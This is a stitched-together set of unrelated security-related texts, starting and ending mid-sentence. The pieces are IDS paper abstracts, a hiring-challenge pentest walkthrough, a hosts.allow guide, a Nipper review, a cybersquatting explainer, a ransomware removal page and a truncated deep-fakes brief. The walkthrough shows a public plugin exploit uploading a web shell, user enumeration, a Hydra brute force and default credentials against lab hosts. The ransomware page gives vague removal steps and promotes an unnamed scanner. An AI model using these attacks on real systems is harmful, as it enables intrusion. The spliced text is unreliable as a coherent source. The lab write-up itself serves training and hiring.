decide appropriate actions, for example DPI or traffic filtering, on the suspicious VMs. Using this approach, NICE does not need to block traffic flows of a suspicious VM in its early attack stage. NICE significantly advances the current network IDS/IPS solutions by employing programmable virtual networking approach that allows the system to construct a dynamic reconfigurable IDS system. NICE, a new multi-phase distributed network intrusion detection and prevention framework in a virtual networking environment that captures and inspects suspicious cloud traffic without interrupting users’ applications and cloud services. NICE incorporates a software switching solution to quarantine and inspect suspicious VMs for further investigation and protection. Through programmable network approaches, NICE can improve the attack detection probability and improve the resiliency to VM exploitation attack without interrupting existing normal cloud services. NICE employs a novel attack graph approach for attack detection and prevention by correlating attack behavior and also suggests effective countermeasures. NICE optimizes the implementation on cloud servers to minimize resource consumption. Our study shows that NICE consumes less computational overhead compared to proxy-based network intrusion detection solutions.
International Journal of Computer Science Issues Internet continues to expand exponentially and access to the Internet become more prevalent in users daily life but at the same time web application are becoming most attractive targets for hacker and cyber criminals. This paper presents an enhanced intrusion detection system approach for detecting input validation attacks in the web application. The existing IDS for Input validation attacks are language dependent. The proposed IDS is language independent i.e. it works for any web application developed with the aid of java, php, dot net etc. In addition the proposed system detects directory traversal attacks, command injection attacks, cross site scripting attacks and SQL injection attacks; those were not detected in the existing IDS.
Last year we decided to expand our pentest team, and we figured that offering a hands-on challenge would be a good filter for possible candidates, since we’ve accumulated quite a bit of experience from organizing wargames and CTF at various events. We provided an isolated network with three hosts and anyone could apply by submitting a name, and email address and a CV – we’ve sent VPN configuration packs to literally everyone who did so. These packs included the following message (the original was in Hungarian). Your task is to perform a comprehensive (!) security assessment of the hosts within range 10.10.82.100-254. Typical tasks of a professional penetration tester include - asking relevant clarifying questions about new projects, - writing the technical part of business proposals, - comprehensive penetration testing, - report writing and presentation. That is why we decided to test the candidates’ knowledge about the above subjects. The scope of the challenge consisted of 3 servers, report writing and presentation to the technical staff with a time limit of two weeks. Here is our solution: As a warm-up exercise we created a simple web hacking challenge. Web applications are the most common targets in real-life projects and their typical vulnerabilities are well known. We created our challenge in form of a modified WordPress installation: we killed some security features and added some new vulnerabilities either to the core or in the form of plug-ins. The default page of the web server was an empty “Index of” page that lead some into thinking that there was nothing hosted on the server. In reality the vulnerable application was located under the /wp/ path that could be easily discovered using most enumeration tools (like DirBuster). It shouldn’t be long before one could stumble upon the first vulnerability: the search box right on the front page was vulnerable to reflective XSS: This vulnerability was meant to be a gift to encourage contestants with a little feeling of success. Unfortunately, only one report contained this finding. The blog also provided some means for authentication. First there was a password protected post, that could be opened using the infamous password “asdf1234”. The catch was that WordPress first hashes the password and places the hash in a cookie that is checked when rendering the post. This way standard login brute-forcers can’t be used but the problem can be solved in many ways. The crypt() method of WordPress can be reused to generate valid cookies or the application can be used as an oracle to generate the appropriate headers – the point was to get the applicant do some basic programming (or at least configuration) work. The second authentication interface is of course the WordPress login interface (wp-login.php). The teszt:teszt credentials were valid on the system (we are a Hungarian company, “test” is spelled “teszt” in Hungarian). This can be brute-forced with standard tools – if the wordlist is customized for the target. We also provided test accounts for the participants. The given credentials only provided privileges to change basic user information. Although the application sent CSRF tokens with this form, they were not checked by the server. More serious vulnerabilities could be found by enumerating installed WordPress plugins – wpscan output: [+] We found 3 plugins: [+] Name: akismet - v2.5.9 | Location: http://10.10.82.153/wp/wp-content/plugins/akismet/<br></br> | Readme: http://10.10.82.153/wp/wp-content/plugins/akismet/readme.txt [+] Name: sexy-contact-form - v0.9.6 | Location: http://10.10.82.153/wp/wp-content/plugins/sexy-contact-form/ | Readme: http://10.10.82.153/wp/wp-content/plugins/sexy-contact-form/readme.txt [!] Title: Creative Contact Form Reference: https://wpvulndb.com/vulnerabilities/7652 Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8739 Reference: http://www.exploit-db.com/exploits/35057/ [i] Fixed in: 1.0.0<br></br> [+] Name: simple-login-log - v1.1.0 | Location: http://10.10.82.153/wp/wp-content/plugins/simple-login-log/ | Readme: http://10.10.82.153/wp/wp-content/plugins/simple-login-log/readme.txt First take a look at Simple Login Log that “tracks user name, time of login, IP address and browser user agent”. Doing some simple tests on the User-Agent header on login shows that (our version of) the plugin is vulnerable to blind SQL injection: The Sexy Contact Form is an interesting beast: when we installed the site last August we threw in random plugins to make the application more “interesting”. One of these plugins was SCF that turned out to be vulnerable to remote code execution last October. We left the plugin enabled to see if anyone notices it. No one did, although even the published exploit works out-of-the-box: $ python 35057.py -t http://10.10.82.153/wp/ -c wordpress -f shell.php [...snip...] [!] Shell Uploaded [!] http://10.10.82.153/wp//wp-content/plugins/sexy-contact-form/includes/fileupload/files/shell.php Although the web challenge may seem like the easiest one, we tried to insert some more subtle vulnerabilities that would require more thinking and manual work from the contestants. The challenge aimed to - test if the contestant has a good overview on web application security and - takes care of every detail of the target. Sadly, most of them only used fully automated tools, which couldn’t even recognize the most basic XSS (or even find the app). Nobody was able to find the CSRF, the post password, the SQLi or the RCE. The second challenge was located at 10.10.82.242. A simple port scan shows that there are some Oracle services listening: Starting Nmap 6.25 ( http://nmap.org ) at 2015-04-01 09:41 CEST Nmap scan report for 10.10.82.242 Host is up (0.021s latency). Not shown: 65530 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 4.3 (protocol 2.0) 53/tcp open domain dnsmasq 2.45 111/tcp open rpcbind 2 (RPC #100000) 1521/tcp open oracle-tns Oracle TNS Listener 10.2.0.3.0 (for Linux) 30316/tcp open oracle-tns Oracle TNS listener From here the task was rather simple. One could follow basically any Oracle hacking tutorial to gain access to the database. First we needed to find some valid SIDs: Then we could use the default wordlist of Metasploit to find some valid accounts: As we can see, there were accounts registered with DBA role using default credentials. Even the good old scott:tiger combination was valid, and the database was vulnerable to multiple privilege escalation attacks. The time to DBA level access was comparable to the startup time of Metasploit – although it never hurts to have our tools properly configured, of course. Since DBA level access was easy to achieve, OS level command execution could also be performed. An obvious way was to use Java stored procedures: After one could overcome the limitations of Runtime.exec() (and SQL*Plus…) the system allowed opening connect-back shells without restriction. After a quick look around, the most elegant way to obtain root privileges was to use the beautiful $ORIGIN expansion exploit of Tavis Ormandy (yes, even GCC was installed): The challenge presented a basic pentest task and required the candidates to follow basic tutorials (if they didn’t have enough Oracle-fu in their fingers, for example: http://www.blackhat.com/presentations/bh-usa-09/GATES/BHUSA09-Gates-OracleMetasploit-SLIDES.pdf). The most time consuming part was likely installing Oracle instant client and configuring Metaploit. Only one participant was able to obtain DBA privileges, no one could execute OS level commands. The last target machine was located at 10.10.82.200. First of all the candidate should have done a port scan: root@s2crew:~# nmap -sV -v -n -T4 -sC 10.10.82.200 Nmap scan report for 10.10.82.200 Host is up (0.036s latency). Not shown: 995 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp OpenVMS ftpd 5.1 23/tcp open telnet Pocket CMD telnetd 53/tcp open domain dnsmasq 2.45 | dns-nsid: |_ bind.version: dnsmasq-2.45 79/tcp open finger OpenVMS fingerd | finger: Username Program Login Term/Location |_SYSTEM $ Sun 02:21 110/tcp open pop3 |_pop3-capabilities: ERROR: Script execution failed (use -d to debug) MAC Address: 00:0C:29:3E:C1:FC (VMware) Service Info: Host: vms.silentsignal.hu; OS: OpenVMS; CPE: cpe:/o:hp:openvms Oh, yes! This is an unbreakable OpenVMS operating system. I think there are only a couple of hackers out there who have remote exploits effective against this target. But a real hacker must solve the problems and discover the weak points of the tested systems, applications. There is a finger service running on the host. Use Google to collect default OpenVMS accounts (http://cd.textfiles.com/group42/PHREAK/XENON/XENON7.HTM). Having that, a simple shell script is enough to check the valid users: root@s2crew:~# for i in `cat tmp.txt`;do finger [email protected];done [10.10.82.200] Username Program Login Term/Location SYSTEM $ Sun 02:21 Login name: SYSTEM In real life: SYSTEM MANAGER Account: SYSTEM Directory: SYS$SYSROOT:[SYSMGR] Last login: Tue 10-DEC-2013 19:17:20 No Plan. [10.10.82.200] Login name: FIELD In real life: FIELD SERVICE Account: FIELD Directory: SYS$SYSROOT:[SYSMAINT] Last login: [Never logged in] No Plan. [10.10.82.200] Login name: SUPPORT In real life: ??? [10.10.82.200] Login name: SYSMAINT In real life: ??? [10.10.82.200] Login name: SYSTEST In real life: SYSTEST-UETP Account: SYSTEST Directory: SYS$SYSROOT:[SYSTEST] Last login: [Never logged in] No Plan. [10.10.82.200] Login name: SYSTEST_CLIG In real life: ??? [10.10.82.200] Login name: DEFAULT In real life: ??? [10.10.82.200] Login name: DECNET In real life: ??? [10.10.82.200] Login name: OPERATIONS In real life: ??? [10.10.82.200] Login name: USER In real life: ??? [10.10.82.200] Login name: LIBRARY In real life: LIBRARY Account: LIBRARY Directory: SYS$SYSDEVICE:[LIBRARY] Last login: Tue 10-DEC-2013 19:49:55 No Plan. [10.10.82.200] Login name: GUEST In real life: ??? [10.10.82.200] Login name: DEMO In real life: DEMO Account: DEMO Directory: SYS$SYSDEVICE:[DEMO] Last login: Tue 10-DEC-2013 19:43:11 No Plan. [10.10.82.200] Login name: HYTELNET In real life: ??? There are lots of default user accounts in the system. Let’s see the default username/password combinations: root@s2crew:~# hydra -L tmp.txt -e nsr -p 123456 telnet://10.10.82.200 Hydra v7.3 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only Hydra (http://www.thc.org/thc-hydra) starting at 2015-03-25 11:14:40 [WARNING] telnet is by its nature unreliable to analyze reliable, if possible better choose FTP or SSH if available [DATA] 16 tasks, 1 server, 60 login tries (l:15/p:4), ~3 tries per task [DATA] attacking service telnet on port 23 [STATUS] 37.00 tries/min, 37 tries in 00:01h, 23 todo in 00:01h, 16 active [telnet] host: 10.10.82.200 login: LIBRARY password: LIBRARY [STATUS] attack finished for 10.10.82.200 (waiting for children to finish) 1 of 1 target successfuly completed, 1 valid password found Hydra (http://www.thc.org/thc-hydra) finished at 2015-03-25 11:16:19 The candidate could log in with the LIBRARY/LIBRARY account into the system: root@s2crew:~# telnet 10.10.82.200 Trying 10.10.82.200... Connected to 10.10.82.200. Escape character is '^]'. Welcome to OpenVMS (TM) VAX Operating System, Version V7.3 Username: LIBRARY Password: Welcome to OpenVMS (TM) VAX Operating System, Version V7.3 Last interactive login on Tuesday, 10-DEC-2013 20:07 1 failure since last successful login $ Done! This kind of attack is really old and common; it takes approximately 5 to 10 minutes. We wanted to make sure that the candidate - was not of afraid exotic or unknown systems, - knew basic hacking concepts, and - could use Google. None of the candidates could solve this task! For the report writing, the candidate should have used a search engine like Google. Some relevant and good results from the first page of the penetration testing report query: Most people were never heard from again, two guys thanked us for the chance, and few candidates submitted an actual report. The challenges were simple and common pentesting tasks. Most contestants couldn’t think like a professional hacker, but the bigger problem was that they couldn’t seem to use Google either. This is really surprising since some CVs were really impressive, including good research and relevant experience at international security companies. It quickly turned out though that a nice reference doesn’t replace hands-on experience. Most approached the challenges in a wrong way that suggests a lack of general concepts w.r.t systems security. For those who want to make a career in penetration testing, we have two suggestions: Try harder and never stop learning! For those who want to hire pentesters: In this profession papers are poor indicators. Real skills show themselves during real exercises. And finally from our side: We are really, really disappointed :( The Silent Signal pentest crew
ITS UNIX Systems Editing hosts.allow and hosts.deny Files To restrict access to your Unix or Linux machine, you must modify the /etc/hosts.allow and /etc/host.deny files. These files are used by the tcpd (tcp wrapper) and sshd programs to decide whether or not to accept a connection coming in from another IP address. ITS recommends that to start with, you restrict access to only those network addresses you are certain should be allowed access. The following two example files allow connections from any address in the virginia.edu network domain, but no others. ITS recommends using the configuration shown in the following /etc/hosts.allow file, to permit connections to any services protected by the tcpd or sshd from only systems within the virginia.edu domain: # # hosts.allow This file describes the names of the hosts which are # allowed to use the local INET services, as decided # by the '/usr/sbin/tcpd' server. # # Only allow connections within the virginia.edu domain. ALL: .virginia.edu Following is ITS's suggested /etc/hosts.deny file content. With this configuration, access to your machine from all hosts is denied, except for those specified in hosts.allow. # # hosts.deny This file describes the names of the hosts which are # *not* allowed to use the local INET services, as decided # by the '/usr/sbin/tcpd' server. # # deny all by default, only allowing hosts or domains listed in hosts.allow. ALL: ALL Page Updated: 2012-02-16
Nipper supports a number of popular security devices, including Check Point Software Technologies Ltd.'s Firewall-1, Cisco Systems Inc. routers (IOS), Cisco Security Appliances, Juniper Networks Inc.'s NetScreen, SonicWall Inc. and others. A Nipper security audit checks configuration settings, password strength, potential problems with protocols and more. The password audit reveals weak passwords or those vulnerable to a dictionary attack, and can export encrypted passwords in a format ready for brute-force attack with a john-the-ripper file. The OS check identifies known vulnerabilities, providing CVE reference and BugTraq IDs. An ACL audit detects rules that are wide open to the point of being insecure, and spots insecure settings -- such as the failure to authenticate OSPF and RIP updates. Checks are customizable, which allows audits to target specific compliance requirements. Nipper runs on Windows, Mac OS X and Linux at the command line, though there is a rudimentary GUI for using it within Windows. Nipper audits against an exported copy of a router's configuration file, so a router is never touched or changed during the audit. It also supports reporting to HTML, XML, Latex and ASCII. Reports note observed findings, potential effects and provide recommendations in understandable English. The recommendations are helpful for understanding possible weaknesses, but the tool can not determine if, say, having IP source routing turned on is necessary to an organizations operations for their environment. In general, Nipper is a good tool for helping organizations keep routers and firewalls configured correctly. About the author: Scott Sidel is an ISSO with Lockheed Martin This was first published in February 2009
In today’s digital age, cybersquatting has become an increasingly prevalent and severe threat. Simply put, cybersquatting refers to the unauthorized use of a domain name with the intention of profiting from someone else’s trademark or brand. It involves bad faith registration, trafficking, or using a domain name to mislead internet users and profit from the goodwill associated with another’s trademark or brand. Cybersquatting can have significant legal and financial consequences, and it is essential to understand this digital threat to protect your online presence. In this section, we will delve into the concept of cybersquatting, its origins, examples of its impact, and the legal implications surrounding it. We will also explore effective practices for preventing cybersquatting and mitigating its risks in e-commerce and social media. Additionally, we will discuss the role of intellectual property rights in combating cybersquatting and the process of domain dispute resolution. By the end of this section, you will have a comprehensive understanding of this digital threat and how to safeguard your digital assets. The Origins and Evolution of Cybersquatting Cybersquatting is a relatively new term that emerged in the late 1990s, following the explosion of the internet and the widespread use of domain names. It refers to the registration, trafficking, or use of a domain name with the intent to profit from another party’s trademark or brand name. Cybersquatters often register domain names that contain a brand name or a misspelled version of a brand name, in the hopes of capitalizing on the traffic generated by the brand’s popularity. The origins of cybersquatting can be traced back to the early days of the internet, when individuals began registering domain names in the hopes of reselling them for a profit. However, the practice really took off in the late 1990s, when the popularity of the internet exploded, and the registration of domain names became more accessible to the general public. At that time, many well-known brands were slow to recognize the value of their domain names, and as a result, cybersquatters were able to register them for a relatively low cost. As cybersquatting became more prevalent, trademark owners began to take notice. In response, the United States passed the Anticybersquatting Consumer Protection Act (ACPA) in 1999, which made it illegal to register or use domain names with the intent to profit from another party’s trademark or brand name. The ACPA also provided a legal remedy for trademark owners who fell victim to cybersquatting. Examples of Cybersquatting Incidents Real-world examples illustrate the various ways in which cybersquatters try to profit from others’ trademarks and brand names. Some of the most well-known cases of cybersquatting include: |Walmart v. Walmartcanada.com||A Canadian individual registered the domain name “Walmartcanada.com” and used it for a website that promoted his own business. Walmart filed a suit against the individual to gain control of the domain, which they won.| |Panavision v. Toeppen||A man named Dennis Toeppen registered the domain name “panavision.com” with the intention of selling it back to the legitimate owner, Panavision. The court found that this constituted bad faith, and Panavision won the case.| |Julia Fiona Roberts v. Russell Boyd||Russell Boyd registered the domain name “Juliaroberts.com” and used it for a website that contained links to pornographic websites. The court ruled in favor of Julia Roberts, who argued that the domain name violated her right to privacy and damaged her reputation.| These examples demonstrate the diverse ways in which cybersquatters seek to profit from others’ trademarks and brand names. In each case, the legitimate trademark owner had to take legal action to reclaim their domain name and protect their online presence. Legal Implications of Cybersquatting The practice of cybersquatting can have significant legal implications. In many countries, it is considered illegal and infringes on intellectual property rights. Trademark owners have legal recourse to protect themselves against cybersquatters. The primary legal mechanism for combating cybersquatting is the Uniform Domain-Name Dispute-Resolution Policy (UDRP). This policy allows trademark owners to file complaints with the domain name registrar against the cybersquatter. The UDRP provides a streamlined legal process for resolving domain name disputes, and it has been widely adopted by domain name registrars and intellectual property organizations globally. |The UDRP process involves the following:| |The trademark owner files a complaint with the domain name registrar and pays a fee.| |The complaint is reviewed by a UDRP panel, which is composed of independent experts in the field.| |The panel decides whether the domain name is identical or confusingly similar to the trademark, whether the cybersquatter has no legitimate interests in the domain, and whether the cybersquatter registered and used the domain in bad faith.| |If the panel finds in favor of the trademark owner, the domain name is transferred to the trademark owner.| Aside from the UDRP, there are also other legal avenues to address cybersquatting, such as filing a lawsuit against the cybersquatter for trademark infringement or unfair competition. However, these options can be more time-consuming and costly than the UDRP process. It is essential for individuals and businesses to be aware of the legal implications of cybersquatting and take appropriate action to protect their digital assets. Vigilance and timely action are crucial in preventing cybersquatting from causing serious harm to one’s brand or reputation. Preventing Cybersquatting: Best Practices Preventing cybersquatting is crucial for safeguarding your digital assets. Here are some effective practices to follow: - Register Your Domain Name: Register your domain name as soon as possible to prevent cybersquatters from taking it. - Trademark Your Brand: Trademark your brand to establish legal protection and prevent others from using it in bad faith. - Monitor Your Domain: Monitor your domain name for any unauthorized use or suspicious activity. - Use Different TLDs: Register your brand’s domain name with different TLDs (top-level domains) to prevent cybersquatters from using similar domains. - Use a Privacy Service: Use a privacy service to shield your personal information associated with your domain registration. By implementing these best practices, you can diminish the risk of becoming a victim of cybersquatting and protect your online presence. Cybersquatting: Detecting and Responding to Attempts As cybersquatting continues to pose a threat to individuals and businesses, it’s essential to know how to detect and respond to potential attempts. Here are some strategies: Monitor domain names Regular monitoring of domain names similar to your trademark or brand can help detect potential cybersquatting attempts. Various tools and services are available that can help you keep track of domain registrations that may infringe on your intellectual property rights. Be vigilant of phishing scams Cybersquatters often use phishing scams to trick individuals into giving away their login credentials or financial information. Stay aware of any suspicious emails or messages and avoid clicking on links or downloading attachments from unknown senders. Consider a domain watch service Domain watch services are designed to monitor domain registrations and alert you of any potential infringements. These services can help you identify and act on cybersquatting attempts quickly. Take legal action If you suspect any cybersquatting attempts, it’s vital to take legal action. Consult with an experienced lawyer to determine the appropriate course of action, whether it’s filing a complaint under the Uniform Domain-Name Dispute-Resolution Policy (UDRP) or pursuing litigation. Consider defensive registrations Defensive registrations involve registering domain names that are similar to your trademark or brand to prevent cybersquatters from using them. Although this approach can be costly, it can provide an additional layer of protection. Cybersquatting vs. Domain Name Hijacking: Understanding the Difference Cybersquatting and domain name hijacking are two related but distinct practices that can cause significant harm to individuals and businesses. While they share some similarities, it is essential to understand the differences between them and the specific risks associated with each. Cybersquatting, as discussed earlier in this article, refers to the practice of registering, trafficking, or using a domain name with bad faith intent to profit from the goodwill of someone else’s trademark or brand. Cybersquatters often register domain names that are similar or identical to established brand names, with the aim of tricking users into thinking they are visiting the legitimate website. The harms caused by cybersquatting include brand dilution, loss of revenue, reputational damage, and consumer confusion. Many cybersquatters use so-called “typosquatting” techniques, registering domains that contain common misspellings of well-known brand names, further increasing the likelihood of user confusion. Domain Name Hijacking In contrast, domain name hijacking refers to the unauthorized transfer of a domain name from its rightful owner to a different registrar or owner. Domain name hijacking can occur through various means, such as social engineering, phishing, or hacking. Domain name hijacking can cause severe damage to individuals and businesses, as the hijacker takes control of the domain and can use it for malicious purposes, such as hosting spam or phishing websites. Additionally, domain name hijacking can result in lost revenue, reputational damage, and the loss of valuable digital assets. The Importance of Understanding the Difference While both cybersquatting and domain name hijacking are serious threats, understanding their differences is crucial for effectively combating and addressing them. For instance, the legal remedies available for cybersquatting and domain name hijacking are different, and understanding the distinctions can help determine the appropriate course of action. Additionally, prevention and mitigation strategies for each practice may vary, and individuals and businesses must tailor their efforts accordingly. By understanding the differences between cybersquatting and domain name hijacking, individuals and businesses can better protect their digital assets and maintain the integrity of their online presence. The Role of Intellectual Property Rights in Combating Cybersquatting Intellectual property rights (IPR) play a crucial role in safeguarding digital assets against cybersquatting. IPR laws are designed to protect brand owners from the unauthorized use of their intellectual property, including trademarks, copyrights, and patents. In the context of cybersquatting, IPR laws provide a legal framework for enforcing trademark rights and taking action against cybersquatters. Trademark owners can rely on several legal remedies to combat cybersquatting. One of the most commonly used mechanisms is the Uniform Domain-Name Dispute-Resolution Policy (UDRP), a process established by the Internet Corporation for Assigned Names and Numbers (ICANN) for resolving domain name disputes. The UDRP provides a streamlined process for trademark owners to recover domain names from cybersquatters. Other legal options for combating cybersquatting include the Anticybersquatting Consumer Protection Act (ACPA) and the Lanham Act. The ACPA is a federal law that provides additional legal remedies for trademark owners, including the ability to recover damages from cybersquatters. The Lanham Act provides similar protections and allows trademark owners to file lawsuits against cybersquatters in federal court. Overall, intellectual property rights are an essential tool for combating cybersquatting and protecting digital assets. Businesses and individuals should take proactive measures to secure their intellectual property rights and enforce them against cybersquatters. Cybersquatting and E-Commerce: Risks and Mitigation Strategies Cybersquatting poses significant risks for e-commerce businesses, including brand dilution, reputational damage, and financial losses. To safeguard against cybersquatting, businesses can implement the following mitigation strategies: - Register all relevant domain names: Secure all domain names that are relevant to your business, including variations and common misspellings. - Monitor domain registrations: Set up alerts to track new domain name registrations that may infringe on your trademarks and intellectual property. - Take legal action: If you discover that someone has registered or is using a domain name that infringes on your trademarks or intellectual property, take legal action to protect your rights. In addition to implementing these strategies, e-commerce platforms can take steps to protect their users from cybersquatting, such as: |Domain verification:||Require sellers to verify their domain ownership before listing products on your platform.| |Trademark infringement detection:||Use automated monitoring tools to detect and flag potential trademark infringements on your platform.| |Dispute resolution:||Provide a clear and transparent process for resolving domain name and trademark disputes on your platform.| By implementing these strategies, e-commerce businesses and platforms can protect themselves and their customers from the risks of cybersquatting. Cybersquatting and Social Media: Guarding Your Online Presence Social media platforms have become an integral part of our daily lives, providing us with a platform to connect, share, and engage with people. However, cybersquatters have also recognized the potential of these platforms to profit from others’ goodwill and reputation. In this section, we will explore the potential risks of cybersquatting on social media and provide tips on how to protect your online presence. The Risks of Cybersquatting on Social Media Cybersquatting on social media platforms involves creating fake accounts or impersonating individuals or businesses to deceive users into providing personal information or engaging in monetary transactions. These malicious practices can result in financial losses, reputational damage, and legal consequences. Additionally, cybersquatting on social media can lead to brand dilution and confusion among users, ultimately affecting the credibility and authenticity of the affected brand. Cybersquatters also exploit the popularity of hashtags and keywords related to specific events or products. For instance, during the holiday season, cybersquatters may register domain names and social media handles related to popular gift items and use them to redirect traffic to their own websites or products. This can result in significant financial losses for businesses and individuals who are the rightful owners of the trademarks or products in question. Protecting Your Online Presence on Social Media Here are some tips on how to protect your online presence on social media: - Regularly monitor social media platforms for any impersonation or fake accounts that may pose a risk to your brand or reputation. - Claim your social media handles and domain names that are associated with your brand or trademark. This will prevent cybersquatters from impersonating or exploiting your brand or product. - Use strong and unique passwords for all your social media accounts and enable two-factor authentication for added security. - Ensure that all your social media profiles and pages are verified, providing an extra layer of credibility and authenticity to your brand or product. - Educate your employees and customers on the potential risks of cybersquatting on social media and how to avoid falling victim to these scams. By implementing these best practices, individuals and businesses can safeguard their online presence on social media and minimize the risks posed by cybersquatting. Cybersquatting and Domain Disputes: Understanding the Process In cases of cybersquatting, domain name disputes can arise between the trademark owner and the alleged infringing party. Domain name disputes are often resolved through arbitration rather than traditional court proceedings. This section will provide an overview of the domain dispute resolution process in cases of cybersquatting. The Uniform Domain-Name Dispute-Resolution Policy (UDRP) The Uniform Domain-Name Dispute-Resolution Policy (UDRP) is a widely used dispute resolution mechanism for resolving domain name disputes. It is administered by the World Intellectual Property Organization (WIPO) and applies to most top-level domains (TLDs), including .com, .net, and .org. The UDRP is designed to provide a streamlined and cost-effective process for resolving disputes related to domain name registration. The UDRP process typically involves the following steps: |1||Submitting a complaint: The trademark owner initiates the UDRP process by filing a complaint with an approved dispute resolution provider. The complaint must include a detailed description of the alleged cybersquatting activity and evidence of the trademark owner’s rights in the disputed domain name.| |2||Notification: Once the complaint is accepted, the dispute resolution provider notifies the alleged cybersquatter of the complaint and provides a deadline for response.| |3||Response: The alleged cybersquatter has a limited time to respond to the complaint, providing evidence of rights or legitimate interests in the disputed domain name and refuting the allegations of bad faith.| |4||Decision: A panel of independent experts appointed by the dispute resolution provider reviews the evidence presented by both parties and issues a final decision. The decision may result in the transfer or cancellation of the disputed domain name.| The UDRP process typically takes 45-60 days from start to finish and is designed to provide a relatively swift and efficient resolution to domain disputes. Other Dispute Resolution Mechanisms In addition to the UDRP, other dispute resolution mechanisms may be available for resolving domain name disputes. These include the Uniform Rapid Suspension System (URS), which provides a faster, less expensive option for trademark owners in cases of clear-cut cybersquatting; and court proceedings, which may be necessary in cases involving complex legal issues or disputes between parties in different jurisdictions. It is essential to understand the options available for resolving domain name disputes and to seek legal advice from a qualified attorney before pursuing any specific course of action. Frequently Asked Questions (FAQ) about Cybersquatting In this section, we will answer some common questions about cybersquatting to provide readers with a better understanding of this digital threat. Q: What is cybersquatting? A: Cybersquatting refers to the practice of registering, trafficking, or using a domain name with bad faith intent to profit from the goodwill of someone else’s trademark or brand. This involves the unauthorized exploitation of digital assets, leading to significant legal and financial consequences. Q: How do cybersquatters profit from their actions? A: Cybersquatters profit from their actions by either selling the domain name to the legitimate trademark owner or by using it to generate revenue through advertising or redirecting traffic to a different website. Q: Who are the victims of cybersquatting? A: The victims of cybersquatting are typically businesses or individuals who own trademarked names or brands. However, anyone with an online presence can be a target of cybersquatting. Q: What are some common examples of cybersquatting? A: Some common examples of cybersquatting include registering a domain name that is similar to a well-known brand, registering the name of a celebrity or public figure, and registering a domain name that includes a misspelling of a famous brand. Q: How can I protect my business from cybersquatting? A: To protect your business from cybersquatting, you can take several measures, such as registering your trademark with the relevant authorities, monitoring the internet for any unauthorized use of your trademark, and taking legal action against any cybersquatters. Q: What should I do if I am a victim of cybersquatting? A: If you are a victim of cybersquatting, you should consult with a lawyer who specializes in intellectual property law. You may be able to file a complaint under the Uniform Domain-Name Dispute-Resolution Policy (UDRP) or take legal action against the cybersquatter. Q: Can cybersquatting be prevented? A: While it is impossible to completely prevent cybersquatting, you can take steps to minimize the risk, such as registering your domain name as soon as possible, registering similar domain names and misspellings, and implementing strong trademark protection measures. Q: How can I learn more about cybersquatting and its implications? A: There are several resources available online, such as legal websites and intellectual property organizations, that provide extensive information about cybersquatting and its implications. Additionally, consulting with a lawyer who specializes in intellectual property law can provide more in-depth knowledge and guidance.
Ransomware continue threating the cyber world and VisionCrypt Ransomware another member of this family. This nasty threat was first detected by a malware researcher Lawrence Abrams on May 19th, 2017. The ransomware got its name after the ‘VisionCryptor.exe’ file which it use to drop in the infected system. However the purpose of this ransomware is not different from its other family member but it is little bit different from them. It silently make its entry in the targeted system and immediately start its encryption process. It want the victim to keep open the VisionCrypt 2.0 Window in their system if they want to cooperate in decrypting the file. According to its infection report, this file encoder is designed to aim the English speaking users, but researcher also not deny that it can’t infect computer located in other part of world. Researcher suggest to remove it with the help of strong antivirus. VisionCrypt Ransomware : How It Execute Its Purpose? Just after its invasion VisionCrypt Ransomware create entries in the Windows registry which provide it persistence. Such entries help the virus to start automatically when the operating system start. Not only this it also delete the shadow volume copies from the Windows which make the encryption more workable. The ransomware is designed to encrypt different kind of file types such as audio, video, database, picture, document etc. To encrypt these data it use AES-128 encryption algorithm and after encryption the file become inaccessible. User can easily recognize the encrypted files because the ransomware append .VisionCrypt extension to each of the affected files. Different antivirus vendor detect the files associated with VisionCrypt Ransomware as following name : VisionCrypt Ransomware is programmed to collect sensitive information such as IP address, computer name, system GUID and send to its developer. It also find out the running antivirus of the system and block it to not get interrupted in its malicious process. As mentioned above it open a window named as VisionCrypt 2.0, which contain the ransom note. The ransom window inform the user what happens with their files and warn them to not close the window. It also contain a timer which run a countdown of 48 hours. Criminals want the victim to pay ransom if they want to get the private decryption key. According to a report the crooks want user to pay 25 USD in the exchange of decryptor. Here you can see the text written in the VisionCrypt 2.0 Window. Dealing With VisionCrypt Ransomware We know that the files stored on your system are important but it is still not suggested to pay ransom to criminals. Maybe the 25 USD not seems to a big amount for you but it is not guaranteed that you will get the private key even after paying. This clearly means that paying ransom help the criminals to exceed their business. Keeping backup of important files is always helpful in such situation because you can easily restore the files without any clamor. You can also use a proper recovery program to get back your files. Instructions To Remove VisionCrypt Ransomware Before you restore your file, make sure to remove VisionCrypt Ransomware otherwise it will invite more dangerous threat. To remove it from your system you can use the following manual removal steps. Step 1 : Remove VisionCrypt Ransomware From Control Panel - Click on start button >> Go to Control Panel - Now Select Add/Remove programs - Locate VisionCrypt Ransomware from installed program - Finally select them and uninstall. Step 2 : Remove suspicious files from control panel - Close all the programs and select control panel. - Choose uninstall a program option. - You will get all the installed program. - Find out program related to VisionCrypt Ransomware. - Click on Uninstall option to remove them. Step 3 : Remove Ransomware related entries From Windows Registry - Press Windows + R key together, to open the Run Box. - Then type “regedit” to open Windows registry - Look for entries related with ransomware - Click on Disable option, to remove related entries. If you are still having problem in removing the ransomware then don’t worry. It is recommended to use Free-scanner, it deeply scans the system and remove the threat completely from it.
January 30, 2020 IntelBrief: The Challenge of Deep Fakes Deep fakes are videos that have been digitally altered or manipulated, typically with the assistance of machine learning tools, to produce human bodies and/or faces that look and sound authentic. As witnessed with comedian Jordan Peele’s deep-fake video impersonating President Barack Obama, they can be used for entertainment. Other positive uses are depicting now-deceased actors and actresses in movies as if they were still alive. But there is concern over a more sinister or nefarious use of deep fakes, in which these videos can deliberately mislead people into believing an individual said or did something that is entirely fabricated. The implications are dire. Just consider the fallout from a deep fake that depicts a world leader announcing a military strike on an adversarial nation. The threat is compounded when one considers the use of deep fakes in conjunction with other types of attacks, including either kinetic strikes or cyber attacks, and how quickly a deep fake can spread on the internet and through social media platforms. There are also variants of deep fakes known as ‘cheap fakes,’ or attempted manipulations done with cheaper software, even including a mere Photoshop-version of a video or image. With the proliferation of social media and more readily accessible software and technologies, there are a range of options available to anyone seeking to experiment with video and image manipulation. Last year, a so-called ‘cheap fake’ emerged of Speaker of the House Nancy Pelosi. The video was deliberately slowed down to make it appear that Speaker Pelosi was impaired or slurring her words. While it was eventually revealed that the video was doctored, it was still viewed millions of times on social 